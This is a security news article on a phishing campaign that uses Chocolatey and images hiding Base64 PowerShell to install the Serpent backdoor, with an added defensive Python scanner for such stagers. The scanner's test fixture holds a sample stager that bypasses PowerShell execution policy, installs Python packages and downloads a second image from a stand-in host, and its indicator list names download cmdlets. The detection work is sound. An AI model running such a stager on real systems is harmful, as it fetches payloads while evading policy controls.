Researchers have discovered a new targeted email campaign against French construction, real estate, and government entities. It abuses the Chocolatey Windows package manager to install the Serpent backdoor on compromised devices. Based on the techniques used and the victimology, enterprise security firm Proofpoint assessed that the attacks are likely the work of an advanced threat actor. The campaign's ultimate objective is unknown at this time.
“The threat actor attempted to install a backdoor on a potential victim’s device, which could enable remote administration, command and control (C2), data theft, or deliver other additional payloads,” Proofpoint researchers said.
The infection chain starts with a phishing email that carries a résumé-themed subject line and a macro-enabled Microsoft Word attachment posing as information on the European Union's General Data Protection Regulation (GDPR). If the recipient enables macros, the macro runs and fetches a seemingly benign image file from a remote server. That image conceals a Base64-encoded PowerShell script using steganography, a rarely seen technique for hiding malicious code inside image or audio data so that the download is not flagged.
The PowerShell script uses Chocolatey to install Python and its package installer pip on the Windows device; pip is then used to install the PySocks proxy library. The same script also downloads a second image file from the same remote server. That image hides the Python-based backdoor, dubbed Serpent, which executes commands received from the C2 server.
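The two steps above (a Base64-encoded PowerShell stager carried inside an image, then a stager that drives Chocolatey, pip and a download of a second image) give a hunt team something concrete to look for. The following scanner is an added example written for this article, not code from Proofpoint or from the campaign. It assumes the simplest concealment, a Base64 blob appended after the PNG IEND chunk, which is an assumption; the page does not describe the actual steganographic encoding. The sample image, the hypothetical stager text and the `http://example.invalid/` URL are all constructed for the test.

```python
import base64
import binascii
import re

# --- Constructed sample artefact (not a real campaign file) ---------------
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
IEND_CHUNK = b"\x00\x00\x00\x00IEND\xaeB`\x82"

# Hypothetical stager modelled on the chain the article describes:
# Chocolatey -> Python/pip -> PySocks -> fetch a second image.
SAMPLE_STAGER = (
    "Set-ExecutionPolicy Bypass -Scope Process -Force; "
    "choco install python -y; "
    "pip install pysocks; "
    "Invoke-WebRequest -Uri http://example.invalid/second.png -OutFile second.png"
)


def build_sample_image(stager: str) -> bytes:
    """Fake PNG: signature, 64 dummy bytes, IEND, then Base64(UTF-16LE stager).
    UTF-16LE is what PowerShell -EncodedCommand expects, so that is what a
    stager of this kind is most likely to carry."""
    return PNG_SIGNATURE + b"\x00" * 64 + IEND_CHUNK + base64.b64encode(
        stager.encode("utf-16le")
    )


# --- Detection logic -------------------------------------------------------
# Runs of Base64 alphabet long enough to be a script rather than noise.
BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

# Indicators of the install chain described in the article.
INDICATORS = {
    "chocolatey_install": re.compile(r"\bchoco(?:latey)?\s+install\b", re.I),
    "pip_install": re.compile(r"\bpip3?\s+install\b", re.I),
    "pysocks": re.compile(r"\bpysocks\b", re.I),
    "remote_download": re.compile(
        r"Invoke-WebRequest|DownloadFile|DownloadString|\biwr\b", re.I
    ),
    "execution_policy_bypass": re.compile(r"Set-ExecutionPolicy\s+Bypass", re.I),
}


def decode_base64_run(run: bytes):
    """Decode a Base64 run, repairing padding; None if it is not valid Base64."""
    stripped = run.rstrip(b"=")
    padded = stripped + b"=" * (-len(stripped) % 4)
    try:
        return base64.b64decode(padded)
    except binascii.Error:
        return None


def bytes_to_script_text(raw: bytes):
    """Pick the decoding (UTF-16LE or UTF-8) that yields mostly ASCII text.
    Scoring on ASCII printables avoids mistaking UTF-16LE NULs for text and
    avoids mis-reading plain UTF-8 as a run of printable CJK code points."""
    best_text, best_score = None, 0.0
    for enc in ("utf-16le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        ascii_like = sum(1 for ch in text if 0x20 <= ord(ch) <= 0x7E or ch in "\r\n\t")
        score = ascii_like / max(len(text), 1)
        if score > best_score:
            best_text, best_score = text, score
    return best_text if best_score >= 0.9 else None


def scan_image(data: bytes):
    """Return one hit per embedded Base64 blob that decodes to a script
    containing at least one indicator. Each hit records the byte offset,
    the indicator names found and the decoded text."""
    hits = []
    for match in BASE64_RUN.finditer(data):
        raw = decode_base64_run(match.group(0))
        if raw is None:
            continue
        text = bytes_to_script_text(raw)
        if text is None:
            continue
        found = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if found:
            hits.append({"offset": match.start(), "indicators": found, "text": text})
    return hits


if __name__ == "__main__":
    for hit in scan_image(build_sample_image(SAMPLE_STAGER)):
        print(f"offset {hit['offset']}: {', '.join(hit['indicators'])}")
        print(hit["text"])
```

The same `INDICATORS` table can be run over PowerShell script block logs (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational channel), where the stager has to appear in clear text regardless of how it was hidden in the image. Note the limits of the file scan: a payload hidden in pixel data rather than appended after IEND, or compressed before encoding, will not produce a contiguous Base64 run and needs a decoder specific to that scheme.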
Beyond the steganography, Proofpoint noted that using a legitimate, widely deployed tool such as Chocolatey as the initial payload, followed by ordinary Python packages, is an attempt to blend in with normal administrative activity and avoid being flagged as a threat. The attacks have not been linked to any previously known actor or group, but they are believed to be the work of a skilled team.